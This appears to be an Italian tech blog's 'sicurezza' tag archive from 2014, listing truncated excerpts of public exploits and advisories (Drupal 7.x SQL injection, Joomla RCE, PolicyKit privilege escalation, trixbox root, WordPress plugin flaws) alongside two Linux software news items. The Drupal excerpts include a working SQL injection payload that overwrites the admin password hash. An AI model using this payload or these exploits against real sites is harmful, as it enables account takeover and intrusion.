Tags archives: sicurezza

 

0

WordPress Database Manager 2.7.1 Command Injection / Credential Leak

Title: Vulnerabilities in WordPress Database Manager v2.7.1 Author: Larry W. Cashdollar, @_larry0 Date: 10/13/2014 Download: https://wordpress.org/plugins/wp-dbmanager/ Downloads: 1,171,358 Vendor: Lester Chan, https://profiles.wordpress.org/gamerz/ Contacted: 10/13/2014, Vulnerabilities addressed in v2.7.2. Full Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-dbmanager-2.7.1/index.html CVE: 2014-8334,2014-8335 OSVDBID: 113508,113507,113509   Description: “Allows you to optimize database, repair database, backup database, restore database, delete backup database , drop/empty tables and [...]

 

0

Joomla Akeeba Kickstart Unserialize Remote Code Execution

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’ require ‘rex/zip’ require ‘json’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, ‘Name’ => “Joomla Akeeba Kickstart Unserialize Remote Code Execution”, ‘Description’ => %q{ This module exploits a vulnerability [...]

 

0

Drupal Core 7.32 SQL Injection

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 #Creditz to https://www.reddit.com/user/fyukyuk import urllib2,sys from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py host = sys.argv[1] user = sys.argv[2] password = sys.argv[3] if len(sys.argv) != 3: print “host username password” print “http://nope.io admin wowsecure” hash = DrupalHash(“$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML”, password).get_hash() target = ‘%s/?q=node&destination=node’ % host post_data = “name[0%20;update+users+set+name%3d'" +user +"'+,+pass+%3d+'" [...]

 

0

Drupal Core 7.32 SQL Injection

<?php #—————————————————————————–# # Exploit Title: Drupal core 7.x – SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: http://www.drupal.com/ # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #—————————————————————————–#   $url = ‘http://www.example.com’; $post_data = “name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in”; [...]

 

0

Linux PolicyKit Race Condition Privilege Escalation

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class Metasploit4 < Msf::Exploit::Local Rank = GreatRanking   include Msf::Exploit::EXE include Msf::Post::File   include Msf::Exploit::Local::Linux   def initialize(info = {}) super(update_info(info, ‘Name’ => ‘Linux PolicyKit Race Condition Privilege Escalation’, ‘Description’ => %q( A race condition flaw was found in the PolicyKit pkexec [...]

 

0

PoliArch 14.10 Disponibile per il download

E’ disponibile la nuova versione 14.10 di PoliArch, distribuzione basata su Arch Linux dedicata alla gestione, ripristino del nostro sistema

PoliArch
Dal successo di Arch Linux sono nate negli ultimi anni molti progetti dedicati con interessanti caratteristiche. Ad esempio troviamo Manjaro, attualmente la più famosa derivata di Arch Linux, BBQLinux derivata dedicata agli sviluppatori Android ecc. Tra i vari progetti basati su Arch Linux troviamo anche PoliArch, progetto italiano sviluppato all’interno delle attività del Centro di Competenza per l’open source e il software libero del Politecnico di Torino open@polito. PoliArch è una distribuzione live sviluppata per fornire all’utente o professionista di strumenti per la gestione, ripristino, amministrazione di un sistema.

Continua a leggere…

 

0

Fonality Trixbox CE 2.8.0.4 Command Execution

#!/usr/bin/perl # # Title: Fonality trixbox CE remote root exploit # Author: Simo Ben youssef # Contact: Simo_at_Morxploit_com # Discovered & Coded: 2 June 2014 # Published: 17 October 2014 # MorXploit Research # http://www.MorXploit.com # Software: trixbox CE # Version: trixbox-2.8.0.4.iso # Vendor url: http://www.fonality.com/ # Download: http://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/ # Vulnerable file: maint/modules/home/index.php # # [...]

 

0

MAT mantenere la privacy togliendo metadati da file multimediali

MAT è un’utile software che ci consente di rimuovere facilmente metadati da vari file multimediali in maniera tale da mantenere la nostra privacy.

MATin Ubuntu
Quando scattiamo una foto con il nostro smartphone o fotocamera digitale, il dispositivo salva all’interno dell’immagini dei metadati, utili informazioni che includono ad esempio la data, località, informazioni sul device ecc. I metadati possono essere presenti anche in documenti, file video, file compressi ecc e molto spesso vengono utilizzati per facilitarci la ricerca ecc anche se in alcuni casi possono mettere a rischio la nostra privacy. Esempio i metadati delle immagini condivise possono raccontare bene o male la nostra storia, includendo ad esempio date e volendo anche la località di quando sono state scattate. E‘ possibile per fortuna rimuovere tutte queste informazioni per garantire una maggiore privacy, per farlo possiamo utilizzare MAT, semplice software open source per Linux.

Continua a leggere…

 

0

Drupal 7.X SQL Injection

#!/usr/bin/python # # # Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 # Inspired by yukyuk’s P.o.C (https://www.reddit.com/user/fyukyuk) # # Tested on Drupal 7.31 with BackBox 3.x # # This material is intended for educational # purposes only and the author can not be held liable for # any kind of damages done whatsoever to your machine, [...]

 

0

WordPress MaxButtons 1.26.0 Cross Site Scripting

Advisory ID: HTB23237 Product: MaxButtons WordPress plugin Vendor: Max Foundry Vulnerable Version(s): 1.26.0 and probably prior Tested Version: 1.26.0 Advisory Publication: September 24, 2014 [without technical details] Vendor Notification: September 24, 2014 Vendor Patch: October 2, 2014 Public Disclosure: October 15, 2014 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2014-7181 Risk Level: Low CVSSv2 Base [...]